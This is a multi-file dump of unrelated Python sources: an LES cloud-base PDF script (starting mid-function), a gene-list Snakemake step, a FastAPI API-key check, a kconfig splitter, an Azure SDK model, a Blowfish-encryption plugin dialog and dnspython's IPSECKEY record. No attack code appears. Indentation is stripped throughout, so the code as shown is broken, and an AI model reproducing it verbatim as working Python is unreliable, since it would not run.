dz = z_prof[1]-z_prof[0]
print('dz: ',dz)
#for boundary scaling
total_surf_buoy_flux = file_prof['bflux'][:,1]
total_surf_thl_flux = file_prof['thlflux'][:,1]
total_surf_qt_flux = file_prof['qtflux'][:,1]
time_prof = file_prof['time'][:]
cbl_1d_prof = time_prof*0.0
#Hack together the Lifting condensation level LCL
qt_pressure = p*qt
sat_qv = 6.112*100 * np.exp(17.67 * (T - 273.15) / (T - 29.65 ))
#rel_hum = np.asmatrix(qt_pressure/sat_qv)[0]
rel_hum = qt_pressure/sat_qv
#Dewpoint
A = 17.27
B = 237.7
alpha = ((A * (T- 273.15)) / (B + (T-273.15)))
alpha = alpha + np.log(rel_hum)
dewpoint = (B * alpha) / (A - alpha)
dewpoint = dewpoint + 273.15
LCL = 125.*(T-dewpoint)
LCL_index = np.floor(LCL/dz)
#now calculate the cbl top for each profile time
for tt in range(len(time_prof)):
w_var = 1.0
z=z_min
while w_var > 0.08:
z += 1
w_var = w2[tt,z]
#w_var = np.var(w_1d[z,:])
#Minimum of the LCL and the w-variance based height plus 300 m
cbl_1d_prof[tt] = min(z+300/dz,LCL_index[tt])
#To avoid issues later on I set the maximum cbl height to 60 % of the domain height, but spit out a warning if it happens
if cbl_1d_prof[tt]>0.6*nz_prof:
print('warning, cbl height higher than 0.6 domain height, could crash regularization later on, timestep: ',tt)
cbl_1d_prof[tt] = math.floor(nz_prof*0.6)
print('resulting indexes of cbl over time: ',cbl_1d_prof)
print('calculated LCL: ',LCL_index)
#Now we either iterate over columns or timesteps
if data_dim_flag==1:
n_iter =len(filename_column)
if data_dim_flag==3:
n_iter =len(time_prof)
#for col in filename_column:
n_iter = min(n_iter,N_it_max)
for it in range(N_it_min,n_iter):
time1 = ttiimmee.time()
if data_dim_flag ==1:
print('loading column: ',filename_column[it])
file_col = Dataset(filename_column[it], mode='r')
w_2d = file_col.variables['w'][:]
w_2d = w_2d.transpose()
ql_2d = file_col.variables['ql'][:]
ql_2d = ql_2d.transpose()
t_1d = file_col.variables['time'][:]
print('t_1d',t_1d)
#Load the var file, even if it means that we double-load w_2d or ql_2d
var_2d = file_col.variables[reg_var][:]
var_2d = var_2d.transpose()
#The needed cbl height
cbl_1d = t_1d*0
bflux_s_1d = t_1d*0
qtflux_s_1d = t_1d*0
thlflux_s_1d= t_1d*0
#Now we go through profile time snapshots and allocate the closest full time values to the profile values
dt_2 = (time_prof[1]-time_prof[0])/2
for tt in range(len(time_prof)):
cbl_1d[abs(t_1d-time_prof[tt])<dt_2] = cbl_1d_prof[tt]
bflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_buoy_flux[tt]
qtflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_qt_flux[tt]
thlflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_thl_flux[tt]
#to get anomalies we subtract the closest mean profile
if anomaly_flag==1:
for tt in range(len(time_prof)):
tmp_matrix = var_2d[:,abs(t_1d-time_prof[tt])<dt_2]
tmp_vector = var_prof[tt,:]
#because the vectors don't perfectly align
var_2d[:,abs(t_1d-time_prof[tt])<dt_2] = (tmp_matrix.transpose() - tmp_vector).transpose()
# = var_2d[:,abs(t_1d-time_prof[tt])<dt_2]-var_prof[tt,:]
if data_dim_flag ==3:
if sum(file_prof['ql'][it,:])>0.0:
print('loading timestep: ',it)
ql_3d = grab_3d_field(file_ql ,it,'ql')
w_3d = grab_3d_field(file_w ,it,'w')
var_3d = grab_3d_field(file_var ,it,reg_var)
#Here we have to reshape the 3D fields into 2d slices with an imaginary time vector
w_2d = np.array(w_3d.reshape((nz,nx*ny)))
ql_2d = np.array(ql_3d.reshape((nz,nx*ny)))
var_2d = np.array(var_3d.reshape((nz,nx*ny)))
#Now we do the same thing with the transposed field; this used to be an either/or, now it is just added on
w_3d = np.transpose( w_3d, (0, 2, 1))
ql_3d = np.transpose(ql_3d, (0, 2, 1))
var_3d = np.transpose(var_3d, (0, 2, 1))
#globals().update(locals())
w_2d = np.hstack([w_2d ,np.array(w_3d.reshape((nz,nx*ny)))])
ql_2d = np.hstack([ql_2d ,np.array(ql_3d.reshape((nz,nx*ny)))])
var_2d = np.hstack([var_2d ,np.array(var_3d.reshape((nz,nx*ny)))])
#This might save a bit of memory
if reg_var == 'w':
var_2d = w_2d
if reg_var == 'ql':
var_2d = ql_2d
#Should now be able to delete 3d fields as they aren't needed anymore, not sure if that helps save any memory though
del w_3d
del ql_3d
del var_3d
gc.collect()
#fake t vector,
t_1d = np.linspace(0,2*nx*ny,2*nx*ny)
#Switching to anomalies if anomaly flag is used
if anomaly_flag==1:
#because the vectors don't perfectly align
var_2d[:,:] = (var_2d.transpose() - var_prof[it,:]).transpose()
#to get the fake time vector we load the wind from the profile data, which divided by the grid spacing gives us a fake time resolution
#we use the calculated cbl+300 meter or lcl as reference height
ref_lvl = cbl_1d_prof[it]
else:
#If no clouds are present we pass very short empty fields over to the chord searcher
print('skipping timestep: ',it,' cause no clouds')
ql_2d = np.zeros((nz,1))
w_2d = np.zeros((nz,1))
var_2d = np.zeros((nz,1))
t_1d = np.zeros(1)
#The needed cbl height, which is constant everywhere
cbl_1d = t_1d*0
cbl_1d[:] = cbl_1d_prof[it]
#The needed surface buoyancy flux, which is constant everywhere
bflux_s_1d = t_1d*0 + total_surf_buoy_flux[it]
qtflux_s_1d = t_1d*0 + total_surf_qt_flux[it]
thlflux_s_1d = t_1d*0 + total_surf_thl_flux[it]
time2 = ttiimmee.time()
print('loading time:',(time2-time1)*1.0,)
### Detecting whether the lowest cloud cell is within 300 m of the CBL
nt = len(cbl_1d)
cl_base = np.zeros(nt)
#Detecting all cloudy cells
#Used to have a different method using NaNs that doesn't work anymore somehow. Now I just set it really high where there is no cloud.
for t in range(nt):
if np.max(ql_2d[:,t])>ql_min :
cl_base[t]=np.argmax(ql_2d[:,t]>ql_min)
else:
cl_base[t]=10000000
cl_base=cl_base.astype(int)
#Now find cloud bases lower than the max height
cbl_cl_idx = np.where((cl_base-cbl_1d[:nt])*dz<0)[0]
cbl_cl_binary = cl_base*0
cbl_cl_binary[cbl_cl_idx]=1
print('iterating through step ',it,'which contains ',len(cbl_cl_idx),'cloudy columns')
if len(cbl_cl_idx)>0:
#Now calculating the var at cloud base
var_cl_base=var_2d[cl_base[cbl_cl_idx]-1,cbl_cl_idx]
#If boundary scaling is used, the variable is scaled accordingly
#Only called if there are any clouds
if boundary_scaling_flag == 1 and len(cbl_cl_idx)>1:
#First thing to do is calculate the chord base using the 25th percentile in agreement with Neil
if data_dim_flag==3:
z_idx_base_default = math.floor(np.percentile(cl_base[cbl_cl_idx],base_percentile))
# Can't think of a good way to do this, will throw an error for the meantime.
if data_dim_flag==1:
print("sorry, but star scaling is not implemented for 1d data")
sys.exit()
#Now adding the boundary scaling using w*
#Is a bit overcooked currently as it only works with 3D data and thus all surface fluxes are the same everywhere.
surf_flux = np.mean(bflux_s_1d)
base_height = z_idx_base_default*dz
w_star=(base_height*surf_flux)**(1/3)
if reg_var=='w':
boundary_scaling = w_star
if reg_var=='qt':
surf_flux = np.mean(qtflux_s_1d)
boundary_scaling = surf_flux/w_star
if reg_var=='thl':
thl_flux = np.mean(thlflux_s_1d)
boundary_scaling = thl_flux/w_star
var_cl_base = var_cl_base/boundary_scaling
#Calculating the histogram, and adding it to the total histogram
var_hist,bin_edges = np.histogram(var_cl_base,range=range_var,bins=N_bins)
var_hist_sum = var_hist_sum+var_hist
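#Because range_var and N_bins are fixed, the bin edges are identical for every
#timestep, so the per-timestep histograms can simply be summed up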
else:
print('no cloudy columns apparently')
var_pdf = var_hist_sum
save_string_base = '_pdf_'+date+'_d'+str(data_dim_flag)+'_an'+str(anomaly_flag)
if N_it_min>0:
save_string_base = save_string_base+'_Nmin'+str(N_it_min)
if N_it_max<1e9:
save_string_base = save_string_base+'_Nmax'+str(n_iter)
if boundary_scaling_flag==1:
save_string_base = 'star'+save_string_base
save_string = directory_output+ reg_var+save_string_base
save_string = save_string+'.npz'
np.savez(save_string,var_pdf=var_pdf,range_var=range_var)
print('saved pdf with ', sum(var_pdf), 'points to '+save_string)
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
return
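#Minimal usage sketch (hypothetical paths and date, mirroring the defaults above;
#not part of the original workflow):
#
#if __name__ == '__main__':
#    proc_pdf(reg_var='w',
#             date_str='20160611',
#             directory_input='/data/testbed/lasso/sims/',
#             directory_output='data_pdfs/',
#             data_dim_flag=3,
#             boundary_scaling_flag=1,
#             N_bins=400,
#             range_var=[-10,10])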
# ===== expression-atlas-wf/scripts/dmel_tau_housekeeping.py =====
# (repo: jfear/larval_gonad, license: MIT)
"""D. mel housekeeping genes based on tau.
Uses the intersection of w1118 and orgR to create a list of
D. mel housekeeping genes.
"""
import os
from functools import partial
import pandas as pd
from larval_gonad.io import pickle_load, pickle_dump
def main():
# Load mapping of YOgn to FBgn
annot = pickle_load(snakemake.input.annot[0])
pickle_dump(intersect_fbgns(snakemake.input.male, annot), snakemake.output.male)
pickle_dump(intersect_fbgns(snakemake.input.female, annot), snakemake.output.female)
def intersect_fbgns(file_names, annot):
return list(set.intersection(*list(map(partial(convert_to_fbgn, annot=annot), file_names))))
def convert_to_fbgn(file_name, annot):
return set(
[
fbgn
for fbgn in map(lambda x: annot.get(x, None), pickle_load(file_name))
if fbgn is not None
]
)
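# Sketch of the data flow above (hypothetical IDs): if one pickle yields YOgn IDs that
# map to {FBgn1, FBgn2} and another to {FBgn2, FBgn3}, intersect_fbgns returns [FBgn2];
# YOgn IDs missing from annot are dropped by convert_to_fbgn before intersecting.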
if __name__ == "__main__":
if os.getenv("SNAKE_DEBUG", False):
from larval_gonad.debug import snakemake_debug
snakemake = snakemake_debug(
workdir="expression-atlas-wf",
input=dict(
male=[
"../output/expression-atlas-wf/tau_housekeeping/w1118_male.pkl",
"../output/expression-atlas-wf/tau_housekeeping/orgR_male.pkl",
],
female=[
"../output/expression-atlas-wf/tau_housekeeping/w1118_female.pkl",
"../output/expression-atlas-wf/tau_housekeeping/orgR_female.pkl",
],
annot="../output/expression-atlas-wf/YOgn_to_dmel_ortholog/dmel.pkl",
),
)
main()
# ===== api-server/server/core/key.py =====
# (repo: TK-IBM-Call-for-Code-Challange-2021/call-for-code-challenge-2021, license: MIT)
"""
Api Key validation
"""
from typing import Optional
from fastapi.security.api_key import APIKeyHeader
from fastapi import HTTPException, Security, Depends
from starlette.status import HTTP_401_UNAUTHORIZED, HTTP_400_BAD_REQUEST, HTTP_403_FORBIDDEN
from server.core.security import verify_key
from server.db.mongodb import AsyncIOMotorClient, get_database
from server.models.user import User
from server.db.crud.user import get_user_by_email
from pydantic import EmailStr
api_key_scheme = APIKeyHeader(name="X-API-KEY", auto_error=False)
email_scheme = APIKeyHeader(name="X-EMAIL-ID", auto_error=False)
async def validate_request(
api_key: Optional[str] = Security(api_key_scheme),
email_id: Optional[EmailStr] = Security(email_scheme),
db: AsyncIOMotorClient = Depends(get_database)
) -> Optional[User]:
"""Validate a request with given email and api key
to any endpoint resource
"""
if api_key is None:
raise HTTPException(
status_code=HTTP_400_BAD_REQUEST, detail="X-API-KEY is missing", headers={}
)
if email_id is None:
raise HTTPException(
status_code=HTTP_400_BAD_REQUEST, detail="X-EMAIL-ID is missing", headers={}
)
user = await get_user_by_email(db, email_id)
# verify email & API key
if user:
api_key = str(user.salt) + str(api_key)
if not verify_key(api_key, user.hashed_api_key):
# api key mismatch
raise HTTPException(
status_code=HTTP_401_UNAUTHORIZED, detail="Access not allowed", headers={}
)
if user.disabled:
# disabled user
raise HTTPException(
status_code=HTTP_403_FORBIDDEN, detail="User is disabled", headers={}
)
if not user.is_active:
# user's email is not verified
raise HTTPException(
status_code=HTTP_401_UNAUTHORIZED, detail="Email not verified", headers={}
)
# All verified
return User(**user.dict())
else:
# not a valid email provided
raise HTTPException(
status_code=HTTP_400_BAD_REQUEST, detail="Unknown Email", headers={}
)
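# Minimal usage sketch (hypothetical endpoint; assumes a FastAPI app object and that
# the User model exposes an email field):
#
# from fastapi import FastAPI, Depends
# from server.core.key import validate_request
#
# app = FastAPI()
#
# @app.get("/profile")
# async def profile(user: User = Depends(validate_request)):
#     # clients must send X-API-KEY and X-EMAIL-ID request headers
#     return {"email": user.email}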
# ===== scripts/kconfig-split.py =====
# (repo: Osirium/linuxkit, license: Apache-2.0)
#!/usr/bin/env python
# This is a slightly modified version of ChromiumOS' splitconfig
# https://chromium.googlesource.com/chromiumos/third_party/kernel/+/stabilize-5899.B-chromeos-3.14/chromeos/scripts/splitconfig
"""See this page for more details:
http://dev.chromium.org/chromium-os/how-tos-and-troubleshooting/kernel-configuration
"""
import os
import re
import sys
allconfigs = {}
# Parse config files
for config in sys.argv[1:]:
allconfigs[config] = set()
for line in open(config):
m = re.match("#*\s*CONFIG_(\w+)[\s=](.*)$", line)
if not m:
continue
option, value = m.groups()
allconfigs[config].add((option, value))
# Split out common config options
common = allconfigs.values()[0].copy()
for config in allconfigs.keys():
common &= allconfigs[config]
for config in allconfigs.keys():
allconfigs[config] -= common
allconfigs["common"] = common
# Generate new splitconfigs
for config in allconfigs.keys():
f = open("split-" + config, "w")
for option, value in sorted(list(allconfigs[config])):
if value == "is not set":
print >>f, "# CONFIG_%s %s" % (option, value)
else:
print >>f, "CONFIG_%s=%s" % (option, value)
f.close()
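# Usage sketch (hypothetical config names; note the script is written in Python 2,
# see the print >>f syntax above):
#   ./kconfig-split.py config-generic config-arm64
# writes split-common with the options shared by all inputs, plus split-config-generic
# and split-config-arm64 holding each file's remaining unique options.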
# ===== src/synapse/azext_synapse/vendored_sdks/azure_synapse/models/livy_statement_output.py =====
# (repo: Mannan2812/azure-cli-extensions, license: MIT)
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class LivyStatementOutput(Model):
"""LivyStatementOutput.
:param status:
:type status: str
:param execution_count:
:type execution_count: int
:param data:
:type data: object
:param ename:
:type ename: str
:param evalue:
:type evalue: str
:param traceback:
:type traceback: list[str]
"""
_attribute_map = {
'status': {'key': 'status', 'type': 'str'},
'execution_count': {'key': 'execution_count', 'type': 'int'},
'data': {'key': 'data', 'type': 'object'},
'ename': {'key': 'ename', 'type': 'str'},
'evalue': {'key': 'evalue', 'type': 'str'},
'traceback': {'key': 'traceback', 'type': '[str]'},
}
def __init__(self, **kwargs):
super(LivyStatementOutput, self).__init__(**kwargs)
self.status = kwargs.get('status', None)
self.execution_count = kwargs.get('execution_count', None)
self.data = kwargs.get('data', None)
self.ename = kwargs.get('ename', None)
self.evalue = kwargs.get('evalue', None)
self.traceback = kwargs.get('traceback', None)
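# Construction sketch (hypothetical values; every field is an optional kwarg):
# output = LivyStatementOutput(status='ok', execution_count=1, data={'text/plain': '2'})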
# ===== plugins/Operations/Crypto/blowfish_encrypt_dialog.py =====
# (repo: nmantani/FileInsight-plugins, licenses: BSD-2-Clause, CC0-1.0, MIT)
#
# Blowfish encrypt - Encrypt selected region with Blowfish
#
# Copyright (c) 2019, Nobutaka Mantani
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import binascii
import re
import sys
import time
import tkinter
import tkinter.ttk
import tkinter.messagebox
try:
import Cryptodome.Cipher.Blowfish
import Cryptodome.Util.Padding
except ImportError:
exit(-1) # PyCryptodome is not installed
# Encrypt the selected region with the parameters chosen in the dialog
def encrypt(data, root, cm, ckt, ek, cit, ei):
blowfish_mode = {"ECB":Cryptodome.Cipher.Blowfish.MODE_ECB,
"CBC":Cryptodome.Cipher.Blowfish.MODE_CBC,
"CFB":Cryptodome.Cipher.Blowfish.MODE_CFB,
"OFB":Cryptodome.Cipher.Blowfish.MODE_OFB,
"CTR":Cryptodome.Cipher.Blowfish.MODE_CTR}
mode = cm.get()
key_type = ckt.get()
key = ek.get()
iv_type = cit.get()
iv = ei.get()
if key_type == "Hex":
if re.match("^([0-9A-Fa-f]{2})+$", key):
key = binascii.a2b_hex(key)
else:
tkinter.messagebox.showerror("Error:", message="Key is not in hex format.")
return
else:
key = key.encode()
if mode in ["CBC", "CFB", "OFB", "CTR"] and iv_type == "Hex":
if re.match("^([0-9A-Fa-f]{2})+$", iv):
iv = binascii.a2b_hex(iv)
else:
tkinter.messagebox.showerror("Error:", message="IV is not in hex format.")
return
else:
iv = iv.encode()
if mode in ["CBC", "CFB", "OFB", "CTR"] and len(iv) != Cryptodome.Cipher.Blowfish.block_size:
tkinter.messagebox.showerror("Error:", message="IV size must be %d bytes." % Cryptodome.Cipher.Blowfish.block_size)
return
key_length = len(key)
if key_length < 4 or key_length > 56:
tkinter.messagebox.showerror("Error:", message="Key size must be in the range from 4 bytes and 56 bytes.")
return
try:
if mode == "CFB":
cipher = Cryptodome.Cipher.Blowfish.new(key, blowfish_mode[mode], iv, segment_size=Cryptodome.Cipher.Blowfish.block_size * 8)
elif mode in ["CBC", "OFB"]:
cipher = Cryptodome.Cipher.Blowfish.new(key, blowfish_mode[mode], iv)
elif mode == "CTR": # The first seven bytes of IV are used as nonce and the last byte is used as initial_value (compatible with CyberChef).
cipher = Cryptodome.Cipher.Blowfish.new(key, blowfish_mode[mode], nonce=iv[0:7], initial_value=iv[7])
else:
cipher = Cryptodome.Cipher.Blowfish.new(key, blowfish_mode[mode])
if mode in ["ECB", "CBC"]:
data = Cryptodome.Util.Padding.pad(data, Cryptodome.Cipher.Blowfish.block_size)
d = cipher.encrypt(data)
except Exception as e:
tkinter.messagebox.showerror("Error:", message=e)
root.quit()
exit(1) # Not encrypted
sys.stdout.buffer.write(d)
root.quit()
exit(0) # Encrypted successfully
def combo_mode_selected(root, cm, cit, ei, lc):
mode = cm.get()
if mode == "ECB":
cit.configure(state = "disabled")
ei.configure(state = "disabled")
else:
cit.configure(state = "readonly")
ei.configure(state = "normal")
if mode == "CTR":
lc.grid()
else:
lc.grid_remove()
# Receive data
data = sys.stdin.buffer.read()
# Create input dialog
root = tkinter.Tk()
root.title("Blowfish encrypt")
root.protocol("WM_DELETE_WINDOW", (lambda r=root: r.quit()))
label_mode = tkinter.Label(root, text="Mode:")
label_mode.grid(row=0, column=0, padx=5, pady=5, sticky="w")
combo_mode = tkinter.ttk.Combobox(root, width=5, state="readonly")
combo_mode["values"] = ("ECB", "CBC", "CFB", "OFB", "CTR")
combo_mode.current(0)
combo_mode.grid(row=0, column=1, padx=5, pady=5, sticky="w")
label_key_type = tkinter.Label(root, text="Key type:")
label_key_type.grid(row=1, column=0, padx=5, pady=5, sticky="w")
combo_key_type = tkinter.ttk.Combobox(root, width=5, state="readonly")
combo_key_type["values"] = ("Text", "Hex")
combo_key_type.current(0)
combo_key_type.grid(row=1, column=1, padx=5, pady=5)
label_key = tkinter.Label(root, text="Key:")
label_key.grid(row=1, column=2, padx=5, pady=5, sticky="w")
entry_key = tkinter.Entry(width=32)
entry_key.grid(row=1, column=3, padx=5, pady=5, sticky="w")
entry_key.focus() # Focus to this widget
label_iv_type = tkinter.Label(root, text="IV type:")
label_iv_type.grid(row=2, column=0, padx=5, pady=5, sticky="w")
combo_iv_type = tkinter.ttk.Combobox(root, width=5, state="readonly")
combo_iv_type["values"] = ("Text", "Hex")
combo_iv_type.current(0)
combo_iv_type.grid(row=2, column=1, padx=5, pady=5)
label_iv = tkinter.Label(root, text="IV:")
label_iv.grid(row=2, column=2, padx=5, pady=5, sticky="w")
entry_iv = tkinter.Entry(width=32)
entry_iv.grid(row=2, column=3, padx=5, pady=5, sticky="w")
button = tkinter.Button(root, text="OK", command=(lambda data=data, root=root, cm=combo_mode, ckt=combo_key_type, ek=entry_key, cit=combo_iv_type, ei=entry_iv: encrypt(data, root, cm, ckt, ek, cit, ei)))
button.grid(row=3, column=0, padx=5, pady=5, columnspan=4)
label_ctr = tkinter.Label(root, text="Note:\nThe first seven bytes of IV are used as the nonce and the last one\nbyte is used as the initial value of the counter (compatible with\nCyberChef).", justify="left")
label_ctr.grid(row=4, column=0, padx=5, pady=5, columnspan=4, sticky="w")
label_ctr.grid_remove()
# Set callback functions
combo_mode.bind('<<ComboboxSelected>>', lambda event, root=root, cm=combo_mode, cit=combo_iv_type, ei=entry_iv, lc=label_ctr: combo_mode_selected(root, cm, cit, ei, lc))
combo_mode.bind("<Return>", lambda event, data=data, root=root, cm=combo_mode, ckt=combo_key_type, ek=entry_key, cit=combo_iv_type, ei=entry_iv: encrypt(data, root, cm, ckt, ek, cit, ei))
combo_key_type.bind("<Return>", lambda event, data=data, root=root, cm=combo_mode, ckt=combo_key_type, ek=entry_key, cit=combo_iv_type, ei=entry_iv: encrypt(data, root, cm, ckt, ek, cit, ei))
entry_key.bind("<Return>", lambda event, data=data, root=root, cm=combo_mode, ckt=combo_key_type, ek=entry_key, cit=combo_iv_type, ei=entry_iv: encrypt(data, root, cm, ckt, ek, cit, ei))
combo_iv_type.bind("<Return>", lambda event, data=data, root=root, cm=combo_mode, ckt=combo_key_type, ek=entry_key, cit=combo_iv_type, ei=entry_iv: encrypt(data, root, cm, ckt, ek, cit, ei))
entry_iv.bind("<Return>", lambda event, data=data, root=root, cm=combo_mode, ckt=combo_key_type, ek=entry_key, cit=combo_iv_type, ei=entry_iv: encrypt(data, root, cm, ckt, ek, cit, ei))
button.bind("<Return>", lambda event, data=data, root=root, cm=combo_mode, ckt=combo_key_type, ek=entry_key, cit=combo_iv_type, ei=entry_iv: encrypt(data, root, cm, ckt, ek, cit, ei))
# These are disabled in the initial state (ECB mode)
combo_iv_type.configure(state = "disabled")
entry_iv.configure(state = "disabled")
# Adjust window position
sw = root.winfo_screenwidth()
sh = root.winfo_screenheight()
root.update_idletasks() # Necessary to get width and height of the window
ww = root.winfo_width()
wh = root.winfo_height()
root.geometry('+%d+%d' % ((sw/2) - (ww/2), (sh/2) - (wh/2)))
root.mainloop()
exit(1) # Not encrypted
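# Usage sketch (hypothetical invocation outside FileInsight): the dialog reads the
# selected bytes from stdin and writes the ciphertext to stdout, e.g.
#   printf 'plaintext' | python blowfish_encrypt_dialog.py > out.bin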
# ===== dns/rdtypes/IN/IPSECKEY.py =====
# (repo: preo/dnspython, license: 0BSD)
# Copyright (C) 2006, 2007, 2009-2011 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import cStringIO
import struct
import dns.exception
import dns.inet
import dns.name
import dns.rdata # provides the Rdata base class and _base64ify used below
class IPSECKEY(dns.rdata.Rdata):
"""IPSECKEY record
@ivar precedence: the precedence for this key data
@type precedence: int
@ivar gateway_type: the gateway type
@type gateway_type: int
@ivar algorithm: the algorithm to use
@type algorithm: int
@ivar gateway: the gateway
@type gateway: None, IPv4 address, IPV6 address, or domain name
@ivar key: the public key
@type key: string
@see: RFC 4025"""
__slots__ = ['precedence', 'gateway_type', 'algorithm', 'gateway', 'key']
def __init__(self, rdclass, rdtype, precedence, gateway_type, algorithm,
gateway, key):
super(IPSECKEY, self).__init__(rdclass, rdtype)
if gateway_type == 0:
if gateway != '.' and not gateway is None:
raise SyntaxError('invalid gateway for gateway type 0')
gateway = None
elif gateway_type == 1:
# check that it's OK
junk = dns.inet.inet_pton(dns.inet.AF_INET, gateway)
elif gateway_type == 2:
# check that it's OK
junk = dns.inet.inet_pton(dns.inet.AF_INET6, gateway)
elif gateway_type == 3:
pass
else:
raise SyntaxError('invalid IPSECKEY gateway type: %d' % gateway_type)
self.precedence = precedence
self.gateway_type = gateway_type
self.algorithm = algorithm
self.gateway = gateway
self.key = key
def to_text(self, origin=None, relativize=True, **kw):
if self.gateway_type == 0:
gateway = '.'
elif self.gateway_type == 1:
gateway = self.gateway
elif self.gateway_type == 2:
gateway = self.gateway
elif self.gateway_type == 3:
gateway = str(self.gateway.choose_relativity(origin, relativize))
else:
raise ValueError('invalid gateway type')
return '%d %d %d %s %s' % (self.precedence, self.gateway_type,
self.algorithm, gateway,
dns.rdata._base64ify(self.key))
def from_text(cls, rdclass, rdtype, tok, origin = None, relativize = True):
precedence = tok.get_uint8()
gateway_type = tok.get_uint8()
algorithm = tok.get_uint8()
if gateway_type == 3:
gateway = tok.get_name().choose_relativity(origin, relativize)
else:
gateway = tok.get_string()
chunks = []
while 1:
t = tok.get().unescape()
if t.is_eol_or_eof():
break
if not t.is_identifier():
raise dns.exception.SyntaxError
chunks.append(t.value)
b64 = ''.join(chunks)
key = b64.decode('base64_codec')
return cls(rdclass, rdtype, precedence, gateway_type, algorithm,
gateway, key)
from_text = classmethod(from_text)
def to_wire(self, file, compress = None, origin = None):
header = struct.pack("!BBB", self.precedence, self.gateway_type,
self.algorithm)
file.write(header)
if self.gateway_type == 0:
pass
elif self.gateway_type == 1:
file.write(dns.inet.inet_pton(dns.inet.AF_INET, self.gateway))
elif self.gateway_type == 2:
file.write(dns.inet.inet_pton(dns.inet.AF_INET6, self.gateway))
elif self.gateway_type == 3:
self.gateway.to_wire(file, None, origin)
else:
raise ValueError('invalid gateway type')
file.write(self.key)
def from_wire(cls, rdclass, rdtype, wire, current, rdlen, origin = None):
if rdlen < 3:
raise dns.exception.FormError
header = struct.unpack('!BBB', wire[current : current + 3])
gateway_type = header[1]
current += 3
rdlen -= 3
if gateway_type == 0:
gateway = None
elif gateway_type == 1:
gateway = dns.inet.inet_ntop(dns.inet.AF_INET,
wire[current : current + 4])
current += 4
rdlen -= 4
elif gateway_type == 2:
gateway = dns.inet.inet_ntop(dns.inet.AF_INET6,
wire[current : current + 16])
current += 16
rdlen -= 16
elif gateway_type == 3:
(gateway, cused) = dns.name.from_wire(wire[: current + rdlen],
current)
current += cused
rdlen -= cused
else:
raise dns.exception.FormError('invalid IPSECKEY gateway type')
key = wire[current : current + rdlen].unwrap()
return cls(rdclass, rdtype, header[0], gateway_type, header[2],
gateway, key)
from_wire = classmethod(from_wire)
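# Presentation-format sketch (record adapted from the RFC 4025 examples: precedence 10,
# gateway type 1 = IPv4, algorithm 2 = RSA):
#   38.2.0.192.in-addr.arpa. 7200 IN IPSECKEY ( 10 1 2
#       192.0.2.38
#       AQNRU3mG7TVTO2BkR47usntb102uFJtugbo6BSGvgqt4AQ== )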
# ===== python/input_reader.py =====
# (repo: dagesundholm/DAGE, license: MIT)
"""---------------------------------------------------------------------------------*
* Copyright (c) 2010-2018 Pauli Parkkinen, Eelis Solala, Wen-Hua Xu, *
* Sergio Losilla, Elias Toivanen, Jonas Juselius *
* *
* Permission is hereby granted, free of charge, to any person obtaining a copy *
* of this software and associated documentation files (the "Software"), to deal *
* in the Software without restriction, including without limitation the rights *
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell *
* copies of the Software, and to permit persons to whom the Software is *
* furnished to do so, subject to the following conditions: *
* *
* The above copyright notice and this permission notice shall be included in all*
* copies or substantial portions of the Software. *
* *
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR *
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, *
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE *
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER *
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, *
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE *
* SOFTWARE. *
*----------------------------------------------------------------------------------"""
# Input file reader
